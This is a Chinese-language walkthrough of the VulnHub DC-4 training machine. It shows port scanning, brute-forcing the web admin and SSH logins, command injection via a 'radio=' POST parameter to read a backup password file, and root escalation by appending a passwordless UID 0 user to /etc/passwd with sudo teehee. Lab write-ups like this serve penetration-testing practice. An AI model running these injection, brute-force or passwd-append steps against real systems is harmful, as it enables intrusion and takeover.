環境
Kali: 192.168.132.131
靶機:192.168.132.153 靶機地址:https://www.vulnhub.com/entry/dc-4,313/
一、資訊收集
arp-scan -l

nmap -p- -sC -sV 192.168.132.153

二、漏洞探測
http://192.168.132.153/
Admin Information Systems Login,

使用burpsuite,對用戶為admin進行密碼爆破

用戶為amdin,密碼為happy

登錄,查看System Tools

執行選項,使用burpsuite進行抓包


修改命令,進行重發資料包
radio=ls -la /home&submit=Run

查看每個用戶中檔案,是否存在有價值的檔案
radio=ls -la /home/charles&submit=Run

radio=ls -la /home/jim&submit=Run
發現備份檔案夾

radio=ls -la /home/jim/backups&submit=Run

radio=cat /home/jim/backups/old-passwords.bak&submit=Run
該檔案為舊密碼檔案,保存為字典,進行暴力破解用戶jim的ssh的密碼

三、漏洞驗證
hydra -l jim -P password.txt ssh://192.168.132.153:22 -I -f -V
密碼為:jibril04

進行登錄
ssh [email protected]

查看當前用戶是否存在可用sudo執行的命令

查看用戶的檔案
cat mbox
存在一份郵件

進入/var/mail/中查看其他郵件
cd /var/mail/

發現用戶charles的密碼,切換用戶
su - charles

四、提權
sudo -l
發現可以使用teehee

使用該命令在/ect/passwd檔案中追加新的用戶標識號為0
echo "hack::0:0::/root/:/bin/bash" | sudo teehee -a /etc/passwd

切換用戶,查看flag.txt檔案

五、總結
這套靶機難易程度容易,使用nmap掃描埠,存在登錄界面,進行密碼爆破,存在命令執行漏洞,burpsuite抓包,找到jim用戶的備份檔案為密碼字典,暴力破解jim用戶的密碼,查看用戶郵件,發現用戶charles的密碼,切換用戶,使用sudo的teehee命令進行提權,獲得root權限,
通過該靶機,復習burpsuite抓包,進行密碼爆破的操作,知道/var/mail存放用戶來往郵件,可能存在可利用資訊,使用sudo teehee命令,將用戶追加到/ect/passwd檔案中,達到提權的目,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/303186.html
標籤:其他
